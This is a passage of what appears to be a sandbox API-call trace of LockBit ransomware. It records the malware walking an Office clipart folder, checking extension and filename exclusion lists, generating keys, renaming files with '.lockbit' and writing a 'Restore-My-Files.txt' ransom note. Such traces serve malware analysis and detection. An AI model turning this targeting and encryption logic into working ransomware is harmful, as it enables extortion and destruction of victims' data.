0x753f1e2e [0114.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0114.067] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0114.071] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.071] malloc (_Size=0xa6) returned 0x77d7a8 [0114.071] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.072] free (_Block=0x77d7a8) [0114.072] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.072] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.072] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.072] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad31de00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60c23530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad31de00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec6, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00403_.WMF", cAlternateFileName="")) returned 1 [0114.078] lstrcmpiW (lpString1=".", lpString2="FD00403_.WMF") returned -1 [0114.078] lstrcmpiW (lpString1="..", lpString2="FD00403_.WMF") returned -1 [0114.078] PathFindExtensionW (pszPath="FD00403_.WMF") returned=".WMF" [0114.078] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.078] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.078] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.078] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.078] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.078] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.078] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.079] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.079] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00403_.WMF") returned 1 [0114.080] lstrcmpiW (lpString1="ntldr", lpString2="FD00403_.WMF") returned 1 [0114.080] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00403_.WMF") returned 1 [0114.080] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00403_.WMF") returned -1 [0114.080] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00403_.WMF") returned -1 [0114.080] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00403_.WMF") returned 1 [0114.080] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00403_.WMF") returned 1 [0114.080] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.080] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned=".WMF" [0114.080] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.080] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.080] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.081] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.081] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF.lockbit") returned 72 [0114.081] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00403_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0114.082] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.082] malloc (_Size=0x40068) returned 0x1ff1e60 [0114.082] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7878) returned 1 [0114.082] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0114.082] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.083] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0114.083] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.089] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.089] malloc (_Size=0xa6) returned 0x77d7a8 [0114.089] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.089] free (_Block=0x77d7a8) [0114.089] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.089] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.090] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.090] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac00b100, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60c23530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xac00b100, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x2afa, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00414_.WMF", cAlternateFileName="")) returned 1 [0114.090] lstrcmpiW (lpString1=".", lpString2="FD00414_.WMF") returned -1 [0114.090] lstrcmpiW (lpString1="..", lpString2="FD00414_.WMF") returned -1 [0114.090] PathFindExtensionW (pszPath="FD00414_.WMF") returned=".WMF" [0114.090] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.090] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.091] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.091] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00414_.WMF") returned 1 [0114.092] lstrcmpiW (lpString1="ntldr", lpString2="FD00414_.WMF") returned 1 [0114.092] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00414_.WMF") returned 1 [0114.092] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00414_.WMF") returned -1 [0114.092] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00414_.WMF") returned -1 [0114.092] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00414_.WMF") returned 1 [0114.092] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00414_.WMF") returned 1 [0114.092] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.092] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned=".WMF" [0114.092] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.092] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.092] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.093] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.093] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.093] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.093] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.093] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.093] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.093] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.093] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.093] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.093] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF.lockbit") returned 72 [0114.093] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00414_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0114.105] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.105] malloc (_Size=0x40068) returned 0x3e70008 [0114.105] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=11002) returned 1 [0114.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.106] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0114.106] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.106] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0114.106] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0114.108] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.109] malloc (_Size=0xa6) returned 0x77d7a8 [0114.109] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.110] free (_Block=0x77d7a8) [0114.110] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.110] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.110] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.110] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaacf8400, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60c23530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xaacf8400, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x400c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00419_.WMF", cAlternateFileName="")) returned 1 [0114.110] lstrcmpiW (lpString1=".", lpString2="FD00419_.WMF") returned -1 [0114.110] lstrcmpiW (lpString1="..", lpString2="FD00419_.WMF") returned -1 [0114.110] PathFindExtensionW (pszPath="FD00419_.WMF") returned=".WMF" [0114.110] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.110] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.110] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.110] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.110] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.110] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.111] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.112] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.112] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00419_.WMF") returned 1 [0114.112] lstrcmpiW (lpString1="ntldr", lpString2="FD00419_.WMF") returned 1 [0114.112] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00419_.WMF") returned 1 [0114.112] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00419_.WMF") returned -1 [0114.112] lstrcmpiW 